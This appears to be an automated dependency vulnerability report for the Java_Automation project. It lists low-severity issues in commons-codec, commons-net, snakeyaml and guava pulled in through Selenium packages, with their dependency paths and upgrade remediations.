commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.

Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.

Remediation

Upgrade commons-codec:commons-codec to version 1.14 or higher.

References

Information Exposure vulnerability report

low severity

Information Exposure

Vulnerable module: commons-net:commons-net
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › commons-net:commons-net@3.7.1

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.70.0.

Overview

Affected versions of this package are vulnerable to Information Exposure as the FTP client trusts the host from PASV responses by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client.

Remediation

Upgrade commons-net:commons-net to version 3.9.0 or higher.

References

Information Exposure vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when supplied with untrusted input, due to improper limitation for incoming data.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

Stack-based Buffer Overflow vulnerability report

low severity

Creation of Temporary File in Directory with Insecure Permissions

Vulnerable module: com.google.guava:guava
Introduced through: org.seleniumhq.selenium:selenium-firefox-driver@3.141.59, org.seleniumhq.selenium:selenium-java@3.141.59 and others

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.12.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

…and 49 more

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.

NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.

Remediation

Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.

References

Creation of Temporary File in Directory with Insecure Permissions vulnerability report

low severity

Information Disclosure

Vulnerable module: com.google.guava:guava
Introduced through: org.seleniumhq.selenium:selenium-firefox-driver@3.141.59, org.seleniumhq.selenium:selenium-java@3.141.59 and others

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
